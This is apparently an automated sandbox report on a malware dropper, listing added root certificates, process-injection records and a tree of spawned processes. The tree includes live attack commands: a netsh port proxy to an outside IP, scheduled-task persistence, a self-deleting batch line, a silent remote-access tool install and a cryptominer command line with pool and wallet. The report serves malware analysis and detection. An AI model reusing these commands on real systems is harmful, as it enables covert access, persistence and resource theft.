Set value (data)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95	FUCKER.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	FUCKER.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	FUCKER.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2836	pinguin.exe
2836	pinguin.exe
1088	liveupdate.exe
2668	cmd.exe
2668	cmd.exe
1888	certutil.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2452	$77_loader.exe
2452	$77_loader.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2452	$77_loader.exe
2452	$77_loader.exe
2452	$77_loader.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe
2124	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
468	Process not Found

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1088	liveupdate.exe
2668	cmd.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

description	pid	Process
Token: SeDebugPrivilege	1076	FUCKER.exe
Token: SeLockMemoryPrivilege	2124	explorer.exe
Token: SeLockMemoryPrivilege	2124	explorer.exe
Token: SeDebugPrivilege	2452	$77_loader.exe
Token: SeRestorePrivilege	1440	msiexec.exe
Token: SeTakeOwnershipPrivilege	1440	msiexec.exe
Token: SeSecurityPrivilege	1440	msiexec.exe
Token: SeDebugPrivilege	2328	NETSTAT.EXE
Token: SeDebugPrivilege	2424	NETSTAT.EXE
Token: SeDebugPrivilege	1636	NETSTAT.EXE
Token: SeDebugPrivilege	1564	NETSTAT.EXE
Token: SeDebugPrivilege	1620	NETSTAT.EXE
Token: SeDebugPrivilege	2552	NETSTAT.EXE
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1076 wrote to memory of 2932	1076	FUCKER.exe	29
PID 1076 wrote to memory of 2932	1076	FUCKER.exe	29
PID 1076 wrote to memory of 2932	1076	FUCKER.exe	29
PID 1076 wrote to memory of 2932	1076	FUCKER.exe	29
PID 2932 wrote to memory of 1656	2932	TrumTrum.exe	30
PID 2932 wrote to memory of 1656	2932	TrumTrum.exe	30
PID 2932 wrote to memory of 1656	2932	TrumTrum.exe	30
PID 1656 wrote to memory of 2788	1656	cmd.exe	32
PID 1656 wrote to memory of 2788	1656	cmd.exe	32
PID 1656 wrote to memory of 2788	1656	cmd.exe	32
PID 1076 wrote to memory of 2836	1076	FUCKER.exe	33
PID 1076 wrote to memory of 2836	1076	FUCKER.exe	33
PID 1076 wrote to memory of 2836	1076	FUCKER.exe	33
PID 1076 wrote to memory of 2836	1076	FUCKER.exe	33
PID 1076 wrote to memory of 2836	1076	FUCKER.exe	33
PID 1076 wrote to memory of 2836	1076	FUCKER.exe	33
PID 1076 wrote to memory of 2836	1076	FUCKER.exe	33
PID 1076 wrote to memory of 1784	1076	FUCKER.exe	34
PID 1076 wrote to memory of 1784	1076	FUCKER.exe	34
PID 1076 wrote to memory of 1784	1076	FUCKER.exe	34
PID 1076 wrote to memory of 1784	1076	FUCKER.exe	34
PID 2836 wrote to memory of 1088	2836	pinguin.exe	36
PID 2836 wrote to memory of 1088	2836	pinguin.exe	36
PID 2836 wrote to memory of 1088	2836	pinguin.exe	36
PID 2836 wrote to memory of 1088	2836	pinguin.exe	36
PID 2836 wrote to memory of 1088	2836	pinguin.exe	36
PID 2836 wrote to memory of 1088	2836	pinguin.exe	36
PID 2836 wrote to memory of 1088	2836	pinguin.exe	36
PID 1088 wrote to memory of 2668	1088	liveupdate.exe	38
PID 1088 wrote to memory of 2668	1088	liveupdate.exe	38
PID 1088 wrote to memory of 2668	1088	liveupdate.exe	38
PID 1088 wrote to memory of 2668	1088	liveupdate.exe	38
PID 1088 wrote to memory of 2668	1088	liveupdate.exe	38
PID 2668 wrote to memory of 1888	2668	cmd.exe	43
PID 2668 wrote to memory of 1888	2668	cmd.exe	43
PID 2668 wrote to memory of 1888	2668	cmd.exe	43
PID 2668 wrote to memory of 1888	2668	cmd.exe	43
PID 2668 wrote to memory of 1888	2668	cmd.exe	43
PID 1888 wrote to memory of 2124	1888	certutil.exe	44
PID 1888 wrote to memory of 2124	1888	certutil.exe	44
PID 1888 wrote to memory of 2124	1888	certutil.exe	44
PID 1888 wrote to memory of 2124	1888	certutil.exe	44
PID 1888 wrote to memory of 2124	1888	certutil.exe	44
PID 1888 wrote to memory of 2124	1888	certutil.exe	44
PID 1888 wrote to memory of 2124	1888	certutil.exe	44
PID 1888 wrote to memory of 2124	1888	certutil.exe	44
PID 1888 wrote to memory of 2124	1888	certutil.exe	44
PID 1888 wrote to memory of 2124	1888	certutil.exe	44
PID 1888 wrote to memory of 2124	1888	certutil.exe	44
PID 1888 wrote to memory of 2124	1888	certutil.exe	44
PID 1076 wrote to memory of 2680	1076	FUCKER.exe	46
PID 1076 wrote to memory of 2680	1076	FUCKER.exe	46
PID 1076 wrote to memory of 2680	1076	FUCKER.exe	46
PID 1076 wrote to memory of 2680	1076	FUCKER.exe	46
PID 1076 wrote to memory of 2452	1076	FUCKER.exe	47
PID 1076 wrote to memory of 2452	1076	FUCKER.exe	47
PID 1076 wrote to memory of 2452	1076	FUCKER.exe	47
PID 1076 wrote to memory of 2452	1076	FUCKER.exe	47
PID 1076 wrote to memory of 2948	1076	FUCKER.exe	48
PID 1076 wrote to memory of 2948	1076	FUCKER.exe	48
PID 1076 wrote to memory of 2948	1076	FUCKER.exe	48
PID 1076 wrote to memory of 2948	1076	FUCKER.exe	48
PID 2948 wrote to memory of 2724	2948	Zenith_Hub_20240229201747443.exe	49
PID 2948 wrote to memory of 2724	2948	Zenith_Hub_20240229201747443.exe	49

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3600	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FUCKER.exe
"C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"
1⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1076
- C:\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1656
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:2788
- C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2836
- C:\Users\Admin\AppData\Local\Temp\Files\nc64.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\nc64.exe"
  2⤵
  - Executes dropped EXE
  PID:1784
- C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
  C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\SysWOW64\cmd.exe
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:2668
  - - C:\Windows\System32\certutil.exe
      C:\Windows\System32\certutil.exe
      4⤵
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1888
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2124
- C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\sc.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Launches sc.exe
  PID:2680
- C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe"
  2⤵
  - Sets file execution options in registry
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2452
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\9aoo6eyj.cmdline"
    3⤵
    PID:2696
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES868F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC868E.tmp"
      4⤵
      PID:2472
- - C:\Windows\system32\chcp.com
    "C:\Windows\system32\chcp.com" 437
    3⤵
    PID:1620
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:2584
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    - Suspicious use of AdjustPrivilegeToken
    PID:2328
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    - Suspicious use of AdjustPrivilegeToken
    PID:1636
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy reset
    3⤵
    PID:1968
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:380
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=5.133.65.53
    3⤵
    PID:1556
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:1400
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:1904
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    - Suspicious use of AdjustPrivilegeToken
    PID:1564
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    - Suspicious use of AdjustPrivilegeToken
    PID:1620
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    - Suspicious use of AdjustPrivilegeToken
    PID:2552
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\RMS.exe"
    3⤵
    PID:4788
  - - C:\Users\Admin\AppData\Local\Temp\Files\RMS.exe
      C:\Users\Admin\AppData\Local\Temp\Files\RMS.exe
      4⤵
      PID:4588
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\INSTAL~1.EXE" /rsetup
        5⤵
        
        PID:4200
      - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\INSTAL~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\INSTAL~1.EXE /rsetup
        6⤵
        
        PID:5072
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn
        7⤵
        
        PID:4236
        
        C:\Windows\SysWOW64\msiexec.exe
        
        C:\Windows\System32\msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi /qn
        8⤵
        
        PID:4868
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c C:\Users\Admin\AppData\Local\Temp\killself.bat
        7⤵
        
        PID:1452
- C:\Users\Admin\AppData\Local\Temp\Files\Zenith_Hub_20240229201747443.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Zenith_Hub_20240229201747443.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies system executable filetype association
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2948
- - C:\Users\Admin\AppData\Local\Temp\3582-490\Zenith_Hub_20240229201747443.exe
    "C:\Users\Admin\AppData\Local\Temp\3582-490\Zenith_Hub_20240229201747443.exe"
    3⤵
    - Executes dropped EXE
    PID:2724
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2724 -s 360
      4⤵
      Loads dropped DLL
      PID:2032
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\DIGITA~1.EXE"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:2508
- - C:\Users\Admin\AppData\Local\Temp\Files\DIGITA~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\DIGITA~1.EXE
    3⤵
    - Executes dropped EXE
    PID:884
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\patch.exe"
  2⤵
  PID:2056
- - C:\Users\Admin\AppData\Local\Temp\Files\patch.exe
    C:\Users\Admin\AppData\Local\Temp\Files\patch.exe
    3⤵
    PID:1508
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~1.EXE"
  2⤵
  PID:2880
- - C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~1.EXE
    3⤵
    PID:2700
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U2300~1.EXE"
      4⤵
      PID:2488
    - - C:\Users\Admin\AppData\Local\Temp\U2300~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U2300~1.EXE
        5⤵
        
        PID:2424
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U2301~1.EXE"
      4⤵
      PID:2840
    - - C:\Users\Admin\AppData\Local\Temp\U2301~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U2301~1.EXE
        5⤵
        
        PID:952
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
        6⤵
        
        PID:2952
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:764
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        7⤵
        Creates scheduled task(s)
        
        PID:2140
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
  2⤵
  PID:1960
- - C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
    C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
    3⤵
    PID:1952
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpC36E.tmp.bat""
      4⤵
      PID:2704
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:1908
    - - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        
        "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        
        PID:2272
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        6⤵
        
        PID:2956
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn ERGVRDVMSK /tr C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        7⤵
        
        PID:2820
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn ERGVRDVMSK /tr C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        8⤵
        Creates scheduled task(s)
        
        PID:1936
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        6⤵
        
        PID:2928
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\DIGITA~2.EXE"
  2⤵
  PID:1028
- - C:\Users\Admin\AppData\Local\Temp\Files\DIGITA~2.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\DIGITA~2.EXE
    3⤵
    PID:1988
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
  2⤵
  PID:1144
- - C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
    C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
    3⤵
    PID:1288
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\BBLb.exe"
      4⤵
      PID:268
    - - C:\Users\Admin\AppData\Local\Temp\BBLb.exe
        
        C:\Users\Admin\AppData\Local\Temp\BBLb.exe
        5⤵
        
        PID:2004
      - C:\Users\Admin\AppData\Local\Temp\BBLb.exe
        
        C:\Users\Admin\AppData\Local\Temp\BBLb.exe
        6⤵
        
        PID:4320
  - - C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
      C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
      4⤵
      PID:1420
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\test.exe"
  2⤵
  PID:2648
- - C:\Users\Admin\AppData\Local\Temp\Files\test.exe
    C:\Users\Admin\AppData\Local\Temp\Files\test.exe
    3⤵
    PID:2696
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\INST77~1.EXE"
  2⤵
  PID:2800
- - C:\Users\Admin\AppData\Local\Temp\Files\INST77~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\INST77~1.EXE
    3⤵
    PID:2488
  - - C:\Program Files (x86)\òÐòÐÎåÏßÆ×²¥·ÅÆ÷\inst77player.exe
      "C:\Program Files (x86)\òÐòÐÎåÏßÆ×²¥·ÅÆ÷\inst77player.exe"
      4⤵
      PID:2660
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\amert.exe"
  2⤵
  PID:304
